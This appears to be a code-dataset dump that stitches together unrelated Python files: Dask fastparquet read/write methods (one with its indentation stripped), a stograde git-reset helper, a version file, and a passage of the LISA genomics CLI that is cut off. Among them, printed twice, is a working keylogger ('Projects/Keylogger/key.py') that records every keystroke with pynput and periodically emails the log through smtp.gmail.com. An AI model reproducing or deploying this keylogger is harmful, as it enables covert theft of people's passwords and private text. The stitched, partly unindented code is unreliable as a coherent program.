                lambda *args: parquet_file.dtypes
            )  # ugly patch, could be fixed

            # Convert ParquetFile to pandas
            return cls.pf_to_pandas(
                parquet_file,
                fs=fs,
                columns=columns,
                categories=categories,
                index=index,
                **kwargs.get("read", {}),
            )

        else:
            # `sample` is NOT a tuple
            raise ValueError(f"Expected tuple, got {type(sample)}")
    @classmethod
    def pf_to_pandas(
        cls,
        pf,
        fs=None,
        columns=None,
        categories=None,
        index=None,
        open_file_options=None,
        **kwargs,
    ):
        """Materialize the fastparquet ``ParquetFile`` *pf* as a pandas DataFrame.

        Mostly copied from fastparquet's ``ParquetFile.to_pandas``; maintained
        here so Dask can control remote file handling (precaching/buffering).
        Extra ``kwargs`` are forwarded to ``pf.read_row_group_file``.
        """
        # Work on a copy of the requested columns; default to all data columns
        # plus the hive-partition ("cats") columns.
        if columns is not None:
            columns = columns[:]
        else:
            columns = pf.columns + list(pf.cats)
        if index:
            # Index columns must be materialized too.
            columns += [i for i in index if i not in columns]
        # Pre-allocate the output frame for the total row count and obtain
        # writable views into its column buffers.
        rgs = pf.row_groups
        size = sum(rg.num_rows for rg in rgs)
        df, views = pf.pre_allocate(size, columns, categories, index)
        start = 0
        # Group row-groups by the data file they live in, so each file is
        # opened exactly once.
        fn_rg_map = defaultdict(list)
        for rg in rgs:
            fn = pf.row_group_filename(rg)
            fn_rg_map[fn].append(rg)
        # Choose file-opening behavior: no precaching for local filesystems,
        # parquet-aware precaching for remote ones.
        precache_options, open_file_options = _process_open_file_options(
            open_file_options,
            **(
                {
                    "allow_precache": False,
                    "default_cache": "readahead",
                }
                if _is_local_fs(fs)
                else {
                    "metadata": pf,
                    "columns": list(set(columns).intersection(pf.columns)),
                    "row_groups": [rgs for rgs in fn_rg_map.values()],
                    "default_engine": "fastparquet",
                    "default_cache": "readahead",
                }
            ),
        )
        with ExitStack() as stack:
            for fn, infile in zip(
                fn_rg_map.keys(),
                _open_input_files(
                    list(fn_rg_map.keys()),
                    fs=fs,
                    context_stack=stack,
                    precache_options=precache_options,
                    **open_file_options,
                ),
            ):
                for rg in fn_rg_map[fn]:
                    thislen = rg.num_rows
                    # Slice this row-group's window out of every column view;
                    # "-catdef" views are passed through whole (presumably
                    # shared category definitions — TODO confirm).
                    parts = {
                        name: (
                            v
                            if name.endswith("-catdef")
                            else v[start : start + thislen]
                        )
                        for (name, v) in views.items()
                    }
                    # Decode this row-group's data directly into the views.
                    pf.read_row_group_file(
                        rg,
                        columns,
                        categories,
                        index,
                        assign=parts,
                        partition_meta=pf.partition_meta,
                        infile=infile,
                        **kwargs,
                    )
                    start += thislen
        return df
    @classmethod
    def initialize_write(
        cls,
        df,
        fs,
        path,
        append=False,
        partition_on=None,
        ignore_divisions=False,
        division_info=None,
        schema=None,
        object_encoding="utf8",
        index_cols=None,
        custom_metadata=None,
        **kwargs,
    ):
        """Prepare *path* for writing *df* with fastparquet.

        Creates the output directory, builds (or, for ``append=True``, loads
        and validates) the parquet file metadata, and returns
        ``(i_offset, fmd, metadata_file_exists, extra_write_kwargs)`` where
        ``i_offset`` is the part number to start new files at.
        """
        if index_cols is None:
            index_cols = []
        if append and division_info is None:
            # Without division info we cannot check overlap on append.
            ignore_divisions = True
        fs.mkdirs(path, exist_ok=True)
        if object_encoding == "infer" or (
            isinstance(object_encoding, dict) and "infer" in object_encoding.values()
        ):
            raise ValueError(
                '"infer" not allowed as object encoding, '
                "because this required data in memory."
            )
        metadata_file_exists = False
        if append:
            try:
                # to append to a dataset without _metadata, need to load
                # _common_metadata or any data file here
                pf = fastparquet.api.ParquetFile(path, open_with=fs.open)
                metadata_file_exists = fs.exists(fs.sep.join([path, "_metadata"]))
            except (OSError, ValueError):
                # Nothing readable at `path` yet — treat append as a fresh write.
                append = False
        if append:
            # Validate that the new data is compatible with the existing dataset:
            # file scheme, column set/partitioning, and dtypes must all match.
            if pf.file_scheme not in ["hive", "empty", "flat"]:
                raise ValueError(
                    "Requested file scheme is hive, but existing file scheme is not."
                )
            elif (set(pf.columns) != set(df.columns) - set(partition_on)) or (
                set(partition_on) != set(pf.cats)
            ):
                raise ValueError(
                    "Appended columns not the same.\n"
                    "Previous: {} | New: {}".format(pf.columns, list(df.columns))
                )
            elif (pd.Series(pf.dtypes).loc[pf.columns] != df[pf.columns].dtypes).any():
                raise ValueError(
                    "Appended dtypes differ.\n{}".format(
                        set(pf.dtypes.items()) ^ set(df.dtypes.items())
                    )
                )
            else:
                # Reorder to the existing dataset's column order.
                df = df[pf.columns + partition_on]
            fmd = pf.fmd
            i_offset = fastparquet.writer.find_max_part(fmd.row_groups)
            if not ignore_divisions:
                if not set(index_cols).intersection([division_info["name"]]):
                    # Divisions are not on an index column — nothing to check.
                    ignore_divisions = True
            if not ignore_divisions:
                minmax = fastparquet.api.sorted_partitioned_columns(pf)
                # If fastparquet detects that a partitioned column isn't sorted, it won't
                # appear in the resulting min/max dictionary
                old_end = (
                    minmax[index_cols[0]]["max"][-1]
                    if index_cols[0] in minmax
                    else None
                )
                divisions = division_info["divisions"]
                if old_end is None or divisions[0] <= old_end:
                    raise ValueError(
                        "Appended divisions overlapping with previous ones."
                        "\n"
                        "Previous: {} | New: {}".format(old_end, divisions[0])
                    )
        else:
            # Fresh write: build metadata from the empty meta frame.
            fmd = fastparquet.writer.make_metadata(
                df._meta,
                object_encoding=object_encoding,
                index_cols=index_cols,
                ignore_columns=partition_on,
                **kwargs,
            )
            i_offset = 0
        if custom_metadata is not None:
            # Merge user key/value metadata into the footer metadata.
            kvm = fmd.key_value_metadata or []
            kvm.extend(
                [
                    fastparquet.parquet_thrift.KeyValue(key=key, value=value)
                    for key, value in custom_metadata.items()
                ]
            )
            fmd.key_value_metadata = kvm
        extra_write_kwargs = {"fmd": fmd}
        return i_offset, fmd, metadata_file_exists, extra_write_kwargs
    @classmethod
    def write_partition(
        cls,
        df,
        path,
        fs,
        filename,
        partition_on,
        return_metadata,
        fmd=None,
        compression=None,
        custom_metadata=None,
        **kwargs,
    ):
        """Write a single partition *df* under *path* and return its
        row-group metadata (empty list when ``return_metadata`` is False).
        """
        # Shallow-copy the footer metadata so per-partition tweaks (num_rows,
        # key/value entries) don't leak into the shared object.
        fmd = copy.copy(fmd)
        for s in fmd.schema:
            if isinstance(s.name, bytes):
                # can be coerced to bytes on copy
                s.name = s.name.decode()
        if custom_metadata and fmd is not None:
            fmd.key_value_metadata = fmd.key_value_metadata + (
                [
                    fastparquet.parquet_thrift.KeyValue(key=key, value=value)
                    for key, value in custom_metadata.items()
                ]
            )
        if not len(df):
            # Write nothing for empty partitions
            rgs = []
        elif partition_on:
            # Hive-style write: one file per partition-column value.
            mkdirs = lambda x: fs.mkdirs(x, exist_ok=True)
            # fastparquet >= 0.1.4 dropped the `sep` argument.
            if parse_version(fastparquet.__version__) >= parse_version("0.1.4"):
                rgs = partition_on_columns(
                    df, partition_on, path, filename, fmd, compression, fs.open, mkdirs
                )
            else:
                rgs = partition_on_columns(
                    df,
                    partition_on,
                    path,
                    filename,
                    fmd,
                    fs.sep,
                    compression,
                    fs.open,
                    mkdirs,
                )
        else:
            # Flat write: a single data file for this partition.
            with fs.open(fs.sep.join([path, filename]), "wb") as fil:
                fmd.num_rows = len(df)
                rg = make_part_file(
                    fil, df, fmd.schema, compression=compression, fmd=fmd
                )
            # Record the relative file path on every column chunk so the
            # row-group metadata can be collected into _metadata later.
            for chunk in rg.columns:
                chunk.file_path = filename
            rgs = [rg]
        if return_metadata:
            return rgs
        else:
            return []
@classmethod
def write_metadata(cls, parts, meta, fs, path, append=False, **kwargs):
_meta = copy.copy(meta)
rgs = meta.row_groups
if parts:
for rg in parts:
if rg is not None:
if isinstance(rg, list):
for r in rg:
rgs.append(r)
else:
rgs.append(rg)
_meta.row_groups = rgs
fn = fs.sep.join([path, "_metadata"])
fastparquet.writer.write_common_metadata(
fn, _meta, open_with=fs.open, no_row_groups=False
)
# if appending, could skip this, but would need to check existence
fn = fs.sep.join([path, "_common_metadata"])
fastparquet.writer.write_common_metadata(fn, _meta, open_with=fs.open)
| true | true |
f725f3882774f4a3c357d3b4d5807560a3f511c3 | 1,457 | py | Python | Projects/Keylogger/key.py | eshaananand/HACKTOBERFEST_2021 | e868968e104639307ae18c7cac842c4a092674fb | [
"MIT"
] | null | null | null | Projects/Keylogger/key.py | eshaananand/HACKTOBERFEST_2021 | e868968e104639307ae18c7cac842c4a092674fb | [
"MIT"
] | null | null | null | Projects/Keylogger/key.py | eshaananand/HACKTOBERFEST_2021 | e868968e104639307ae18c7cac842c4a092674fb | [
"MIT"
] | 9 | 2020-10-15T08:15:01.000Z | 2020-10-19T15:04:26.000Z | # -*- coding: utf-8 -*-
"""
Created on Fri Oct 18 00:20:49 2019
@author: Asus
"""
import pynput.keyboard
import threading
import smtplib
class Keylogger:
def __init__(self,time_interval ,email ,password):
self.log ="keylogger started"
self.interval = time_interval
self.email=email
self.password=password
def append_to_log(self,string):
self.log =self.log +string
def process_key_press(self,key):
try:
current_key=str(key.char)
except AttributeError:
if key== key.space:
current_key=" "
elif key == key.backspace :
current_key="*"
elif key == key.enter :
current_key="/"
else:
current_key=" " +str(key)+" "
self.append_to_log(current_key)
def report(self):
self.send_mail(self.email,self.password, "\n\n" + self.log)
self.log=""
timer=threading.Timer(self.interval,self.report)
timer.start()
def send_mail(self,email,password,message):
server=smtplib.SMTP("smtp.gmail.com",587)
server.starttls()
server.login(email,password)
server.sendmail(email,email,message)
server.quit()
def start(self):
keyboard_listener=pynput.keyboard.Listener(on_press=self.process_key_press)
with keyboard_listener:
self.report()
keyboard_listener.join() | 31 | 83 | 0.597804 |
import pynput.keyboard
import threading
import smtplib
class Keylogger:
def __init__(self,time_interval ,email ,password):
self.log ="keylogger started"
self.interval = time_interval
self.email=email
self.password=password
def append_to_log(self,string):
self.log =self.log +string
def process_key_press(self,key):
try:
current_key=str(key.char)
except AttributeError:
if key== key.space:
current_key=" "
elif key == key.backspace :
current_key="*"
elif key == key.enter :
current_key="/"
else:
current_key=" " +str(key)+" "
self.append_to_log(current_key)
def report(self):
self.send_mail(self.email,self.password, "\n\n" + self.log)
self.log=""
timer=threading.Timer(self.interval,self.report)
timer.start()
def send_mail(self,email,password,message):
server=smtplib.SMTP("smtp.gmail.com",587)
server.starttls()
server.login(email,password)
server.sendmail(email,email,message)
server.quit()
def start(self):
keyboard_listener=pynput.keyboard.Listener(on_press=self.process_key_press)
with keyboard_listener:
self.report()
keyboard_listener.join() | true | true |
f725f3d9875d4e6eb82a0011123cb41d1bfeac57 | 149 | py | Python | stograde/student/reset.py | babatana/stograde | c1c447e99c44c23cef9dd857e669861f3708ae77 | [
"MIT"
] | 7 | 2016-08-05T00:41:11.000Z | 2019-08-22T11:12:10.000Z | stograde/student/reset.py | babatana/stograde | c1c447e99c44c23cef9dd857e669861f3708ae77 | [
"MIT"
] | 145 | 2016-08-04T01:07:11.000Z | 2019-09-09T22:07:13.000Z | stograde/student/reset.py | babatana/stograde | c1c447e99c44c23cef9dd857e669861f3708ae77 | [
"MIT"
] | 3 | 2017-02-06T21:52:46.000Z | 2019-02-18T10:35:01.000Z | from ..common import chdir, run
def reset(student: str):
    """Throw away any local edits in *student*'s repo via a forced checkout of master."""
    checkout_cmd = ['git', 'checkout', 'master', '--quiet', '--force']
    with chdir(student):
        run(checkout_cmd)
| 21.285714 | 64 | 0.590604 | from ..common import chdir, run
def reset(student: str):
with chdir(student):
run(['git', 'checkout', 'master', '--quiet', '--force'])
| true | true |
f725f4ccae39d255e7f8a1319af3c13ec1833d91 | 71 | py | Python | nca47/version.py | WosunOO/nca_xianshu | bbb548cb67b755a57528796d4c5a66ee68df2678 | [
"Apache-2.0"
] | null | null | null | nca47/version.py | WosunOO/nca_xianshu | bbb548cb67b755a57528796d4c5a66ee68df2678 | [
"Apache-2.0"
] | null | null | null | nca47/version.py | WosunOO/nca_xianshu | bbb548cb67b755a57528796d4c5a66ee68df2678 | [
"Apache-2.0"
] | null | null | null | import pbr.version
# Package version metadata resolved by pbr (from git tags / sdist PKG-INFO).
version_info = pbr.version.VersionInfo('nca47')
| 17.75 | 48 | 0.760563 | import pbr.version
version_info = pbr.version.VersionInfo('nca47')
| true | true |
f725f4dae2e4c5953b2e2ca2570972ac74936c24 | 22,958 | py | Python | lisa/cli/cli.py | Wang-Cankun/lisa2 | 2407cc3c12f43bf41f0e14b2a8a5fcdfe07ff310 | [
"MIT"
] | 17 | 2020-09-21T20:04:43.000Z | 2022-01-15T11:25:41.000Z | lisa/cli/cli.py | Wang-Cankun/lisa2 | 2407cc3c12f43bf41f0e14b2a8a5fcdfe07ff310 | [
"MIT"
] | 1 | 2021-10-04T22:39:05.000Z | 2021-10-04T22:39:05.000Z | lisa/cli/cli.py | Wang-Cankun/lisa2 | 2407cc3c12f43bf41f0e14b2a8a5fcdfe07ff310 | [
"MIT"
] | 5 | 2021-02-16T13:16:34.000Z | 2022-03-08T16:15:25.000Z | '''
********
Lisa CLI
********
Installing LISA using pip or conda adds the "lisa" command to your path. LISA's functionality is divided into three main subcommands:
* `lisa oneshot`_ : one genelist
* `lisa multi`_ : multiple genelists
* `lisa regions`_ : one genelist and a list of regions
Which are used depending on the evidence you have on hand.
See the `User Guide <user_guide.rst>`_ for more usage information.
See the `Python API <python_api.rst>`_ for more in-depth description of tests and parameters.
'''
from lisa import FromRegions, FromGenes, FromCoverage
from lisa.core.utils import Log
from lisa.core.lisa_core import DownloadRequiredError
from lisa.core.data_interface import DatasetNotFoundError, INSTALL_PATH
from lisa._version import __version__
import configparser
import argparse
import os
import sys
import json
from collections import defaultdict
from shutil import copyfile
import lisa.cli.test_cli as tests
from shutil import copyfile
import numpy as np
from lisa.lisa_public_data.genes_test import _config as public_config
from lisa.lisa_user_data.regions_test import _config as user_config
from lisa.core.io import parse_deseq_file
#____COMMAND LINE INTERFACE________
# argparse attribute names forwarded to the FromGenes constructor ...
INSTANTIATION_KWARGS = ['isd_method','verbose','assays', 'rp_map']
# ... and to its .predict() call (see extract_kwargs).
PREDICTION_KWARGS = ['background_list','num_background_genes','background_strategy', 'seed']
def extract_kwargs(args, keywords):
    """Pull the attributes named in *keywords* out of the namespace *args* into a dict."""
    attr_map = vars(args)
    return {name: attr_map[name] for name in keywords}
def is_valid_prefix(prefix):
    """argparse type-checker for output prefixes.

    A bare name (no ``/``) always passes; a path passes when it already
    exists or its parent directory does. Raises ``ArgumentTypeError``
    otherwise so argparse reports a clean error.
    """
    if '/' not in prefix:
        return prefix
    parent_exists = os.path.isdir(os.path.dirname(prefix))
    if os.path.isdir(prefix) or os.path.isfile(prefix) or parent_exists:
        return prefix
    raise argparse.ArgumentTypeError('{}: Invalid file prefix.'.format(prefix))
def save_results(args, results, metadata):
    """Write LISA results (and optionally metadata) to disk or stdout.

    Results go to ``<output_prefix>.lisa.tsv`` when a prefix was given,
    otherwise the TSV is printed to stdout. Metadata is written as JSON only
    when ``args.save_metadata`` is set; without a prefix the metadata file is
    named after the query-list file.
    """
    if args.save_metadata:
        if args.output_prefix:
            metadata_filename = args.output_prefix + '.metadata.json'
        else:
            metadata_filename = os.path.basename(args.query_list.name) + '.metadata.json'
        with open(metadata_filename, 'w') as f:
            f.write(json.dumps(metadata, indent=4))
    # idiomatic identity test (was: `not args.output_prefix is None`)
    if args.output_prefix is not None:
        with open(args.output_prefix + '.lisa.tsv', 'w') as f:
            f.write(results.to_tsv())
    else:
        print(results.to_tsv())
def lisa_oneshot(args):
    """CLI handler for ``lisa oneshot``: run one gene list through FromGenes."""
    try:
        # background_list may be an open file handle or None ("regulatory"
        # sampling); only file handles have .readlines().
        args.background_list = args.background_list.readlines()
    except AttributeError:
        pass
    results, metadata = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS)).predict(args.query_list.readlines(), **extract_kwargs(args, PREDICTION_KWARGS))
    save_results(args, results, metadata)
def lisa_regions(args):
    """CLI handler for ``lisa regions``: test a gene list against user regions."""
    try:
        # background_list may be an open file handle or None; only file
        # handles have .readlines().
        args.background_list = args.background_list.readlines()
    except AttributeError:
        pass
    # Regions come either from a plain bed file or from a MACS2 .xls output.
    if not args.macs_xls:
        fn = FromRegions.using_bedfile
    else:
        fn = FromRegions.using_macs_output
    results, metadata = fn(args.species, args.query_genes, args.regions, rp_map = args.rp_map,
        rp_decay=args.rp_decay, isd_method=args.isd_method, background_list=args.background_list,
        background_strategy=args.background_strategy, num_background_genes = args.num_background_genes,
        seed=args.seed, header = args.header)
    save_results(args, results, metadata)
def lisa_coverage(args):
    """CLI handler for ``lisa coverage``: test a gene list against a bigwig track."""
    try:
        # background_list may be an open file handle or None; only file
        # handles have .readlines().
        args.background_list = args.background_list.readlines()
    except AttributeError:
        pass
    results, metadata = FromCoverage.using_bigwig(args.species, args.query_genes, args.bigwig_path, rp_map = args.rp_map,
        isd_method=args.isd_method, background_list=args.background_list,
        background_strategy=args.background_strategy, num_background_genes = args.num_background_genes,
        seed=args.seed)
    save_results(args, results, metadata)
def save_and_get_top_TFs(args, query_name, results, metadata):
    """Write one gene list's results (and optional metadata) to disk and
    return the unique factors among its top-ranked hits.

    Parameters
    ----------
    args : namespace with ``output_prefix`` and ``save_metadata``
    query_name : str, suffix appended to the output prefix for this list's files
    results : LISA results object supporting ``to_tsv()`` and ``to_dict()``
    metadata : JSON-serializable dict

    Returns
    -------
    list of str
        Unique factor names from the ten top-ranked results, in rank order.
    """
    with open(args.output_prefix + query_name + '.lisa.tsv', 'w') as f:
        f.write(results.to_tsv())
    if args.save_metadata:
        with open(args.output_prefix + query_name + '.metadata.json', 'w') as f:
            f.write(json.dumps(metadata, indent=4))
    top_TFs = results.to_dict()['factor']
    # dict.fromkeys de-duplicates while preserving ranking order; the previous
    # list(set(...)) returned the top factors in arbitrary hash order.
    return list(dict.fromkeys(top_TFs[:10]))
def print_results_multi(results_summary):
    """Print a tab-separated (sample, top-factors) summary table to stdout."""
    print('Sample\tTop Regulatory Factors:')
    for sample_name, top_factors in results_summary:
        print(sample_name, ', '.join(top_factors), sep='\t')
class MultiError(Exception):
    """Raised when at least one gene list in a multi-list run fails."""
def lisa_multi(args):
    """CLI handler for ``lisa multi``: run several gene lists with one data load.

    Each list is modeled independently; failures are logged and collected
    rather than aborting the run, and a MultiError is raised at the end if
    any list failed.
    """
    log = Log(target = sys.stderr, verbose = args.verbose)
    # Instantiate once so the (expensive) dataset load is shared by all lists.
    lisa = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS), log = log)
    query_dict = {os.path.basename(query.name) : query.readlines() for query in args.query_lists}
    results_summary = []
    all_passed = True
    for query_name, query_list in query_dict.items():
        with log.section('Modeling {}:'.format(str(query_name))):
            try:
                results, metadata = lisa.predict(query_list, **extract_kwargs(args, PREDICTION_KWARGS))
                top_TFs_unique = save_and_get_top_TFs(args, query_name, results, metadata)
                results_summary.append((query_name, top_TFs_unique))
            except AssertionError as err:
                # Log and keep going so one bad list doesn't kill the batch.
                all_passed = False
                log.append('ERROR: ' + str(err))
    print_results_multi(results_summary)
    if not all_passed:
        raise MultiError('One or more genelists raised an error')
def lisa_deseq(args):
    """CLI handler for ``lisa deseq``: split a DESeq2 results file into
    up- and down-regulated gene lists and run LISA on each.
    """
    log = Log(target = sys.stderr, verbose = args.verbose)
    lisa = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS), log = log)
    # Partition genes by the user-supplied LFC / adjusted-p cutoffs.
    up_genes, down_genes = parse_deseq_file(args.deseq_file, lfc_cutoff = args.lfc_cutoff,
        pval_cutoff= args.pval_cutoff, sep = args.sep)
    results_summary = []
    all_passed = True
    for prefix, query_list in zip(['up-regulated', 'down-regulated'], [up_genes, down_genes]):
        with log.section('Modeling {}:'.format(str(prefix))):
            try:
                results, metadata = lisa.predict(query_list, **extract_kwargs(args, PREDICTION_KWARGS))
                top_TFs_unique = save_and_get_top_TFs(args, prefix, results, metadata)
                results_summary.append((prefix, top_TFs_unique))
            except AssertionError as err:
                # Log and continue so the other direction still runs.
                all_passed = False
                log.append('ERROR: ' + str(err))
    print_results_multi(results_summary)
    if not all_passed:
        raise MultiError('One or more genelists raised an error')
def confirm_file(arg):
    """argparse type-checker: pass *arg* through only if it names an existing file."""
    if not os.path.isfile(arg):
        raise argparse.ArgumentTypeError('ERROR: {} is not a valid file'.format(str(arg)))
    return arg
def run_tests(args):
    """CLI handler for ``lisa run-tests``: exercise the oneshot and multi commands."""
    if not args.skip_oneshot:
        tests.test_oneshot(args.test_genelist, args.background_genelist)
    tests.test_multi(args.genelists)
def build_common_args(parser):
    """Attach the options shared by every LISA subcommand to *parser*."""
    seed_help = 'Random seed for gene selection. Allows for reproducing exact results.'
    motifs_help = ('Use motif hits instead of ChIP-seq peaks to represent TF binding '
                   '(only recommended if TF-of-interest is not represented in ChIP-seq database).')
    metadata_help = 'Save json-formatted metadata from processing each gene list.'
    parser.add_argument('--seed', type=int, default=2556, help=seed_help)
    parser.add_argument(
        '--use_motifs', action='store_const', const='motifs',
        default='chipseq', dest='isd_method', help=motifs_help,
    )
    parser.add_argument('--save_metadata', action='store_true', default=False, help=metadata_help)
def build_from_genes_args(parser, add_assays = True):
    """Attach FromGenes-specific options (assay selection, rp_map style) to *parser*."""
    #parser.add_argument('-c','--cores', required = True, type = int)
    if add_assays:
        parser.add_argument('-a','--assays',nargs='+',default=['Direct','H3K27ac','DNase'], choices=['Direct','H3K27ac','DNase'], help = 'Which set of insilico-deletion assays to run.')
    # Choices and default come from the packaged config; first listed style is default.
    parser.add_argument('--rp_map_style', dest = 'rp_map', choices=public_config.get('lisa_params','rp_map_styles').split(','),
        default= public_config.get('lisa_params','rp_map_styles').split(',')[0], help = 'Which style of rp_map to assess influence of regions on genes. "basic" is stricly distance-based, while "enhanced" masks the exon and promoter regions of nearby genes.')
def build_multiple_lists_args(parser):
    """Attach options used by the multi-genelist commands (multi, deseq) to *parser*."""
    parser.add_argument('-o','--output_prefix', required = True, type = is_valid_prefix, help = 'Output file prefix.')
    parser.add_argument('-v','--verbose',type = int, default = 2)
    parser.add_argument('-b','--num_background_genes', type = int, default = public_config.get('lisa_params', 'background_genes'),
        help = 'Number of sampled background genes to compare to user-supplied genes. These genes are selection from other gene lists.')
    parser.add_argument('--random_background', action = 'store_const', const = 'random', default = 'regulatory', dest = 'background_strategy', help = 'Use random background selection rather than "regulatory" selection.')
def build_one_list_args(parser, default_background_strategy = 'regulatory'):
    """Attach options used by the single-genelist commands to *parser*.

    ``--background_list`` and ``--num_background_genes`` are mutually
    exclusive: the user either supplies a background list or a sample size.
    """
    parser.add_argument('-o','--output_prefix', required = False, type = is_valid_prefix, help = 'Output file prefix. If left empty, will write results to stdout.')
    parser.add_argument('--background_strategy', choices = public_config.get('lisa_params', 'background_strategies').split(','),
        default = default_background_strategy,
        help = """Background genes selection strategy. LISA samples background genes to compare to user\'s genes-of-interest from a diverse
        regulatory background (regulatory - recommended), randomly from all genes (random), or uses a user-provided list (provided).
        """)
    background_genes_group = parser.add_mutually_exclusive_group()
    background_genes_group.add_argument('--background_list', type = argparse.FileType('r', encoding = 'utf-8'), required = False,
        help = 'user-supplied list of backgroung genes. Used when --background_strategy flag is set to "provided"')
    background_genes_group.add_argument('-b','--num_background_genes', type = int, default = public_config.get('lisa_params', 'background_genes'),
        help = 'Number of sampled background genes to compare to user-supplied genes')
    parser.add_argument('-v','--verbose',type = int, default = 4)
def build_deseq_args(parser):
    """Attach options for parsing a DESeq2 results file to *parser*."""
    parser.add_argument('deseq_file', type = confirm_file, help = 'DEseq differential expression output file. Will be parsed for differentially up and down-regulated genes.')
    parser.add_argument('-lfc','--lfc_cutoff', type = float, default = 1, help = 'Log2 fold-change cutoff. For up-regulated genes, must have LFC > cutoff. For down-regulated genes, less than -1 * cutoff. Default of 1 means genes must be up or down-regulated by a factor of 2 to be included in query.')
    parser.add_argument('-p','--pval_cutoff', type = float, default = 0.1, help = 'Adjusted p-value cutoff. Gene must have pval below cutoff to be a query gene.')
    parser.add_argument('--sep', type = str, default='\t', help = 'Field separator for DESeq output file.')
class RstFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawTextHelpFormatter):
    """Help formatter that shows argument defaults while leaving the RST
    description text unwrapped."""
parser = argparse.ArgumentParser(
formatter_class=RstFormatter,
description =
"""
Lisa: inferring transcriptional regulators through integrative modeling of public chromatin accessibility and ChIP-seq data
https://genomebiology.biomedcentral.com/articles/10.1186/s13059-020-1934-6
X. Shirley Liu Lab, 2020
""")
parser.add_argument('--version', action = 'version', version = __version__)
subparsers = parser.add_subparsers(help = 'commands')
#__ LISA oneshot command __
oneshot_parser = subparsers.add_parser('oneshot', formatter_class=RstFormatter, description = '''
lisa oneshot
------------
You have:
* one genelist
Use LISA to infer influential TFs from one gene list, with background epigenetic landscape modeled using public data.
If you have multiple lists, this option will be slower than using "multi" due to data-loading time. \n
Example::
$ lisa oneshot hg38 ./genelist.txt -b 501 --seed=2556 --save_metadata > results.tsv
''')
oneshot_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
oneshot_parser.add_argument('query_list', type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene lists. One gene per line in either symbol or refseqID format')
build_one_list_args(oneshot_parser)
build_from_genes_args(oneshot_parser)
build_common_args(oneshot_parser)
oneshot_parser.set_defaults(func = lisa_oneshot)
deseq_parser = subparsers.add_parser('deseq', formatter_class = RstFormatter, description = '''
lisa deseq
----------
You have:
* RNA-seq differential expression results from DESeq2
Use LISA to infer influential TFs given differentially expressed genes found using DESeq2. Will seperate up-regulated and down-regulated genes into their own LISA tests.
Example::
$ lisa deseq hg38 ./deseq_results.tsv -o deseq/ -b 501 --seed=2556 --save_metadata
''')
deseq_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
build_deseq_args(deseq_parser)
build_multiple_lists_args(deseq_parser)
build_from_genes_args(deseq_parser)
build_common_args(deseq_parser)
deseq_parser.set_defaults(func = lisa_deseq, background_list = None)
#__ LISA multi command __
multi_parser = subparsers.add_parser('multi', formatter_class=RstFormatter, description = '''
lisa multi
----------
You have:
* multiple genelists
Use LISA to infer influential TFs from multiple lists. This function processes each genelist independently in the same manner as the "oneshot" command, but reduces data loading time. Useful when performing
the test on up and down-regulated genes from multiple RNA-seq clusters.
Example::
$ lisa multi hg38 ./genelists/*.txt -b 501 -o ./results/
''')
multi_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
multi_parser.add_argument('query_lists', type = argparse.FileType('r', encoding = 'utf-8'), nargs = "+", help = 'user-supplied gene lists. One gene per line in either symbol or refseqID format')
build_multiple_lists_args(multi_parser)
build_from_genes_args(multi_parser)
build_common_args(multi_parser)
multi_parser.set_defaults(func = lisa_multi, background_list = None)
from argparse import SUPPRESS
#____ LISA regions command ____
regions_parser = subparsers.add_parser('regions', formatter_class=RstFormatter, add_help = False, description = '''
lisa regions
------------
You have:
* one genelist
* regions (250 - 1000 bp wide) of interest related to that list
* optional: a positive score/weight associated with each region (you may pass zero-weight regions, but they do not affect the test and will be filtered out)
Use LISA to infer TF influence on your geneset, but provide your regions-of-interest rather than building a background epigenetic model using public data. When providing
your own regions, LISA uses higher resolution, more precise binding data to increase the power of the test. Your regions should be between ~250 and 1000 bp in width, and the
associated score should be positive. Scores are often read-depth at those regions, but can be any metic you think may influence gene regulation.
Example::
$ lisa regions -r ./regions.bed -q ./genelist.txt --save_metadata > results.tsv
$ lisa regions -r ./macs_peaks.xls -q ./genelist.txt --macs_xls > results.tsv
''')
regions_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
regions_required = regions_parser.add_argument_group('required arguments')
regions_required.add_argument('-q', '--query_genes', required = True, type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene list. One gene per line in either symbol or refseqID format')
regions_required.add_argument('-r', '--regions', type = confirm_file, required = True, help = 'Tad-delineated bed file with columns: chr, start, end[, score]. The score column is optional. If not provided, LISA will assign each region a uniform weight.')
regions_optional = regions_parser.add_argument_group('optional arguments')
regions_optional.add_argument('--header', action = 'store_true', default=False, help = 'Bed file has header row as first row. The header row may contain ')
regions_optional.add_argument('--macs_xls', action = 'store_true', default=False, help='If provided, regions file is a MACS2 .xls output file, and the "pileup" field is taken to be the region score.')
regions_optional.add_argument('--rp_map_style', dest = 'rp_map', choices=user_config.get('lisa_params','rp_map_styles').split(','),
default=user_config.get('lisa_params','rp_map_styles').split(',')[0])
regions_optional.add_argument('--rp_decay', type = int, default = user_config.get('lisa_params','rp_decay'),
help = 'Distance in base-pairs in which the influence of a region on a gene decays by half. Increase for more weight on distal elements, decrease for more weight on promoter elements.')
build_one_list_args(regions_optional, default_background_strategy='all')
build_common_args(regions_optional)
regions_optional.add_argument('-h', '--help', action = 'help', default=SUPPRESS)
regions_parser.set_defaults(func = lisa_regions)
#___ LISA coverage commands _____
coverage_parser = subparsers.add_parser('coverage', formatter_class = RstFormatter, add_help = False, description = '''
lisa coverage
------------
You have:
* one genelist
* bigwig of coverage over the genome
Use LISA to infer TF influence on your geneset using your own coverage data. This test is better suited than the "regions" test when your measure produces wide peaks/areas of influence.
An example of this is H3K27ac data, which correlates with gene expression similarly to accessibility, but produces wide peaks that may span many distinct TF binding locations.
Example::
$ lisa coverage -bw ./sample.bigwig -q ./genelist.txt --save_metadata > results.tsv
''')
coverage_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
